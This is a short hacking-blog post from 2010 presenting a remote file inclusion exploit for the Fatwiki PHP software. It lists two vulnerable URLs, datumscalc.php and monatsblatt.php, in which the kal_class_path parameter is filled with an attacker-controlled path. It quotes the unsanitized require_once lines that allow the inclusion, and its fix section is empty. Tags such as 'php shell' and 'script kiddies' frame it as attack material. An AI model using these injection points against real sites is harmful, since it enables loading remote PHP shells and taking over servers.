Fatwiki (fwiki) Remote FiLe include RFI
February 2, 2010, 2:10 pm
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
Filed under: Hack | Tags: bot, exploits, Hack, hacking, php, php shell, remote file include, remote file inclusion, RFI, script kiddies, vuln, vulnerable
[ Vulnerable File ]
/datumscalc.php?kal_class_path=[INDONESIANCODER] |
/monatsblatt.php?kal_class_path=[INDONESIANCODER] |
[ BUG ] |
[!] datumscalc.php |
- require_once("$kal_class_path/kalender.class.php"); |
- require_once("$kal_class_path/feiertage.class.php"); |
- require_once("$kal_class_path/sonnemond.class.php"); |
[!] monatsblatt.php |
- require_once("$kal_class_path/kalender.class.php"); |
- require_once("$kal_class_path/feiertage.class.php"); |
- require_once("$kal_class_path/sonnemond.class.php"); |
- require_once("$kal_class_path/minikal.php"); |
[ FIX ] |
Advertisement
Comments Off
